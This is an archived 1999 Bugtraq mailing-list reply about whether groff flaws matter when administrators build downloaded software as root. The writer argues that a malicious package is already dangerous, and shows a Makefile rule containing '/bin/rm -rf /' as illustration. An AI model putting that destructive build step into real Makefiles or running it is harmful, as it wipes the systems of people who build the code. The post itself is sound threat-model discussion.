Bugtraq mailing list archives
Re: Groff dangerous (was Re: Troff dangerous.)
From: kragen () POBOX COM (Kragen Sitaker)
Date: Mon, 26 Jul 1999 22:55:36 -0400
Someone writes:
The trick is that it can get you if you as a system administrator download some open source program from the Internet, and build and install that program; such activity often happens as "root", so a couple of scenarios are possible:
In most cases, this is a non-problem. The reason this is a non-problem is that, for this to be a threat, your "open source program from the Internet" [sic] has to have been packaged by a malicious person who wants TO Crack your system. But if this is part of your threat model, you won't be safe if you fix groff, because you're executing the makefile supplied by the malicious attacker, which may say x.o: x.c x.h @/bin/rm -rf / & $(CC) $(CFLAGS) x.c -o $@ There might be a case where the scenario you described *is* a problem: where the program in question is never going to be executed as root, and the Makefile has been carefully reviewed, but the source and man pages haven't been. In this case, though, I'd probably just read the makefile and install things by hand with cp. :) There should be a common one-or-two-word name for this kind of non-problem; there are some vivid metaphors for trying to solve it in the literature. (Bruce Schneier's example of planting a big thick stake in front of your house in hopes thieves will run into it is one.) You *must* be clear about your threat model -- i.e. what threats you're trying to defend against -- before you can decide what is and isn't a security problem. (BTW, this groff problem doesn't surprise me much. For a while, I had a special email address you could send nroff-source man pages to and get back formatted PostScript from on my home machine, as a convenience when I was at work on Solaris machines without a decent groff. I didn't tell anybody about it until after I disabled it, because I assumed there were probably security holes in groff; it wasn't written to serve as a security gatekeeper, and a useful rule of thumb is that such programs are not very good at security-boundary maintenance, because it requires a different mindset from regular programming. See http://www.pobox.com/~kragen/security-holes.html for thoughts on this situation and mailto:kragen-hacks-get.19 () kragen dnaco net for the code that made the manpage-to-PostScript converter work.) -- <kragen () pobox com> Kragen Sitaker <http://www.pobox.com/~kragen/> 103 days until the Internet stock bubble bursts on Monday, 1999-11-08.
Current thread:
- Re: Groff dangerous (was Re: Troff dangerous.) Kragen Sitaker (Jul 26)